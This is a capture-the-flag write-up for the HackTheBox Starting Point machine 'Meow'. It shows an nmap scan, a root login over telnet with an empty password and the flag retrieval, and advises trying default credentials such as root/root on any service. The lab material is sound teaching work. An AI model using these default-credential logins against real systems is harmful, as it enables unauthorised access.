← back to writeups
platform HackTheBox
difficulty Easy (Starting Point)

Machine: https://app.hackthebox.com/starting-point

---

Meow is the first machine in the HackTheBox Starting Point series. It intentionally strips the challenge down to its minimum: one open port, one service, one misconfiguration. The lesson is not a technique but a mindset — check the obvious things first, because the obvious things are often the ones that work.

Reconnaissance

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap $TARGET_IP

Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-15 14:03 UTC
Nmap scan report for $TARGET_IP
Host is up (0.031s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

Port 23 is Telnet — a remote shell protocol from the 1970s that predates SSH. Unlike SSH, Telnet transmits everything in plaintext, including credentials. Because of this it has been replaced by SSH in virtually every modern environment, making its presence here already a sign of neglect.

Initial Access

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ telnet $TARGET_IP 23

Trying $TARGET_IP...
Connected to $TARGET_IP.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: root
Password:

Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
root@Meow:~#

A direct root shell is granted with an empty password. The service is misconfigured to allow unauthenticated root login — no brute force or exploitation required.

Flag

root@Meow:~# ls -la
total 36
drwx------  5 root root 4096 Jun 18  2021 .
drwxr-xr-x 20 root root 4096 Jun 18  2021 ..
lrwxrwxrwx  1 root root    9 Jun  4  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3132 Oct  6  2020 .bashrc
drwx------  2 root root 4096 Jun 18  2021 .cache
drwxr-xr-x  3 root root 4096 Jun 18  2021 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwx------  2 root root 4096 Jun 18  2021 .ssh
-rw-r--r--  1 root root   33 Jun 18  2021 flag.txt

root@Meow:~# cat flag.txt
$FLAG

Key Takeaways

  • Telnet is inherently insecure: every byte of the session, including passwords, travels in plaintext. Any observer on the network path captures everything. Modern environments have no legitimate reason to run it.
  • Empty and default credentials (root/root, admin/admin, root/empty) are always the first thing to test on any service — before reaching for any tool.
  • Port numbers map to services: 23 = Telnet, 21 = FTP, 22 = SSH, 80 = HTTP, 443 = HTTPS. Recognising these immediately narrows what to try next.

References